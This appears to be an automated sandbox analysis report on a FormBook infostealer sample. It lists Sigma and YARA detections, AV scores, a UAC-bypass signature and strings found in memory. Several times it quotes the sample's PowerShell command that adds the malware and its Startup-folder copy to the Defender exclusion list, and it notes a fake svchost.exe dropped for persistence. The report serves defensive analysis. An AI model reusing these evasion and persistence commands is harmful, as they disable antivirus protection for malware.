                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RYhdmjjr94.exe' , ParentImage: C:\Users\user\Desktop\RYhdmjjr94.exe, ParentProcessId: 4328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force, ProcessId: 6260
                Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
                Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\2FDD6624\svchost.exe, NewProcessName: C:\Users\Public\Documents\2FDD6624\svchost.exe, OriginalFileName: C:\Users\Public\Documents\2FDD6624\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3472, ProcessCommandLine: 'C:\Users\Public\Documents\2FDD6624\svchost.exe' , ProcessId: 6672
                Sigma detected: T1086 PowerShell ExecutionShow sources
                Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132761948065027952.6260.DefaultAppDomain.powershell

                Malware Analysis System Evasion:

                barindex
                Sigma detected: Powershell adding suspicious path to exclusion listShow sources
                Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RYhdmjjr94.exe' , ParentImage: C:\Users\user\Desktop\RYhdmjjr94.exe, ParentProcessId: 4328, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force, ProcessId: 6512

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for submitted fileShow sources
                Source: RYhdmjjr94.exeVirustotal: Detection: 45%Perma Link
                Source: RYhdmjjr94.exeMetadefender: Detection: 22%Perma Link
                Source: RYhdmjjr94.exeReversingLabs: Detection: 51%
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeVirustotal: Detection: 45%Perma Link
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeMetadefender: Detection: 22%Perma Link
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeReversingLabs: Detection: 51%

                Exploits:

                barindex
                Yara detected UAC Bypass using CMSTPShow sources
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.23.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.26.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.25.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.394b5e7.24.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.394b5e7.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.31.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.31.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.25.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.26.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.23.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RYhdmjjr94.exe PID: 4328, type: MEMORYSTR
                Source: RYhdmjjr94.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                Source: RYhdmjjr94.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.265038309.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.580652189.00000000064DD000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp
                Source: Binary string: RYhdmjjr94.PDBnn source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: = a.pdb= source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: osymbols\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb* source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbote source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbtl@ source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbop\RYhd( source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: QC:\Users\user\Desktop\RYhdmjjr94.PDB source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbnt source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbM source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdbp source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb" source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: *lC:\Users\user\Desktop\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.PythonTools.IronPython.pdb8 source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: C:\Windows\Microsoft.PythonTools.IronPython.pdbpdbhon.pdb source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbAJ!B source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.PythonTools.IronPython.pdb| source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32`Q source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmp
                Source: Binary string: l`C:\Windows\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: aspnet_compiler.pdb source: RYhdmjjr94.exe, 00000000.00000000.431822096.00000000029FC000.00000004.00000001.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.415482365.0000000000287000.00000002.00020000.sdmp, 36C95A71.exe, 00000018.00000000.310088788.0000000000BD7000.00000002.00020000.sdmp, 36C95A71.exe, 00000020.00000000.332330313.0000000000297000.00000002.00020000.sdmp, svchost.exe, 00000024.00000000.359855846.00000000003D7000.00000002.00020000.sdmp, svchost.exe, 00000028.00000000.381985569.0000000000717000.00000002.00020000.sdmp
                Source: Binary string: E:\A\_work\681\b\raw\obj\IronPython\Microsoft.PythonTools.IronPython.pdbo source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                Source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                Source: svchost.exe, 00000003.00000002.597686401.0000028F6969A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: svchost.exe, 00000003.00000002.597686401.0000028F6969A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: RYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPub
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                Source: RYhdmjjr94.exe, 00000000.00000000.395776508.0000000002A20000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: svchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
                Source: AdvancedRun.exe, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                Source: svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000010.00000002.332002756.00000188CA265000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
                Source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000010.00000003.328602178.00000188CA245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

                E-Banking Fraud:

                barindex
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.599863307.0000000007292000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.598338320.00000000070EE000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000025.00000000.601361941.00000000074C9000.00000040.00020000.sdmp, type: MEMORY
                Source: powershell.exeProcess created: 49

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.601965893.00000000076C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.592270922.0000000006791000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.600871078.00000000073C2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000025.00000000.595996658.0000000006CCA000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
